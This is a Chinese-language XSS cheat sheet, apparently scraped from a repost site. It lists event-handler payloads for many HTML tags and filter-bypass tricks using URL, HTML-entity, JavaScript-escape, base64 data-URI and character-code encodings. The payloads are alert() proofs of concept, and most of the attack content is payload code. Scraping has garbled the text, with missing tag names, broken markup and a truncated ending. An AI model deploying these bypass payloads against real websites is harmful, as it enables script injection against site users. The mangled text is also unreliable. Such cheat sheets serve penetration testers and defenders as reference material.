xss|XSS 常用标签及绕过姿势总结渗透测试|web安全|安全|网络安

零基础学黑客，搜索公众号：白帽子左一

一、xss 常见标签语句 0x01. 标签

test xss xss xss xss

0x02. 标签

文章图片 test </code></blockquote><br /> 0x04. 标签<br /> <blockquote><code><audio src=https://www.it610.com/article/1 onerror=alert(1)> <audio><source src="https://www.it610.com/article/x" onerror="alert('xss'); "></audio> <audio controls onfocus=eval("alert('xss'); ") autofocus=""></audio> <audio controls onmouseover="alert('xss'); "><source src="https://www.it610.com/article/x"></audio> </code></blockquote><br /> 0x05. 标签<br /> <blockquote><code><video src=https://www.it610.com/article/x onerror=alert(1)> <video><source onerror="alert('xss'); "></video> <video controls onmouseover="alert('xss'); "></video> <video controls onfocus="alert('xss'); " autofocus=""></video> <video controls onclick="alert('xss'); "></video> </code></blockquote><br /> 0x06. 标签<br /> <blockquote><code><svg onload=javascript:alert(1)> <svg onload="alert('xss'); "></svg> </code></blockquote><br /> 0x07. 标签<br /> <blockquote><code><button onclick=alert(1)> <button onfocus="alert('xss'); " autofocus="">xss</button> <button onclick="alert('xss'); ">xss</button> <button onmouseover="alert('xss'); ">xss</button> <button onmouseout="alert('xss'); ">xss</button> <button onmouseup="alert('xss'); ">xss</button> <button onmousedown="alert('xss'); "></button> </code></blockquote><br /> 0x08.<br /> 标签 <br /> <blockquote><code>这个需要借助url编码来实现绕过原代码： <div onmouseover='alert(1)'>DIV</div> 经过url编码： <div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv> </code></blockquote><br /> <strong>【xss|XSS 常用标签及绕过姿势总结】</strong>0x09. 标签<br> 这个需要借助 data 伪协议和 base64 编码来实现绕过<br /> <blockquote><code><object data="data:text/html; base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object> </code></blockquote><br /> 0x10.<br /> <blockquote><code>>alert('xss')</script> >alert(/xss/)</script> >alert(123)</script> </code></blockquote><br /> 0x11.<br /> 标签<br /> <blockquote><code>xss <br /> xss <br /> xss <br /> xss <br /> </code></blockquote><br /> 0x12. 标签<br /> <blockquote><code><input onclick="alert('xss'); "> <input onfocus="alert('xss'); "> <input onfocus="alert('xss'); " autofocus=""> <input onmouseover="alert('xss'); "> <input type="text" onkeydown="alert('xss'); "></input> <input type="text" onkeypress="alert('xss'); "></input> <input type="text" onkeydown="alert('xss'); "></input> </code></blockquote><br /> 0x13. 标签<br /> <blockquote><code><details ontoggle="alert('xss'); "></details> <details ontoggle="alert('xss'); " open=""></details> </code></blockquote><br /> 0x14. 标签<br /> <blockquote><code><select onfocus="alert('xss'); " autofocus></select> <select onmouseover="alert('xss'); "></select> <select onclick=eval("alert('xss'); ")></select> </code></blockquote><br /> 0x15. 标签<br /> <blockquote><code><form method="x" action="x" onmouseover="alert('xss'); "><input type=submit></form> <form method="x" action="x" onmouseout="alert('xss'); "><input type=submit></form> <form method="x" action="x" onmouseup="alert('xss'); "><input type=submit></form> </code></blockquote><br /> 0x16. 标签<br /> <blockquote><code><body onload="alert('xss'); "></body> </code></blockquote><br /> 二、xss 常见绕过编码绕过<br> 浏览器对 XSS 代码的解析顺序为：HTML解码 —— URL解码 —— JS解码(只支持UNICODE)。<br /> 0x01. html 实体编码<br> 当可控点为单个标签属性时，可以使用 html 实体编码。<br /> <blockquote><code><a href="https://www.it610.com/article/可控点">test</a><iframe src="https://www.it610.com/article/可控点">test<iframe><img alt="xss|XSS 常用标签及绕过姿势总结" onload="javascript:ImgReSize(this)" src="https://www.it610.com/article/可控点"/> <br /> 文章图片 <br /> testPayloadtesttest 注：url 解析过程中，不能对协议类型进行任何的编码操作，所以 javascript: 协议头需要保留。testtest 可以二次编码testtest

0x03. js 编码
解析的时候字符或者字符串仅会被解码为字符串文本或者标识符名称，例如 js 解析器工作的时候将\u0061\u006c\u0065\u0072\u0074进行解码后为alert，而alert是一个有效的标识符名称，它是能被正常解析的。
但是像圆括号、双引号、单引号等等这些字符就只能被当作普通的文本，从而导致无法执行。
由于 js 是最后进行解析的，所以如果混合编码，需要先使用 js 编码再进行 url 编码或者 html 实体编码。
js 编码策略：
“” 加上三个八进制数字，如果个数不够，前面补0，例如 “<” 编码为 “\074”
“\x” 加上两个十六进制数字，如果个数不够，前面补0，例如 “<” 编码为 “\x3c”
“\u” 加上四个十六进制数字，如果个数不够，前面补0，例如 “<” 编码为 “\u003c”
对于一些控制字符，使用特殊的 C 类型的转义风格（例如 \n 和 \r）

文章图片

4. 标签

atob 函数
atob() 方法用于解码使用 base-64 编码的字符串。
语法：window.atob(encodedStr)(encodedStr: 必需，是一个通过 btoa() 方法编码的字符串)

1.test 2.test 3.test 4. 文章图片

0x06. ascii 编码 ascii 编码一般配合String.fromCharCode使用。
alert(1)
十进制：97, 108, 101, 114, 116, 40, 49, 41
十六进制：0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29
十进制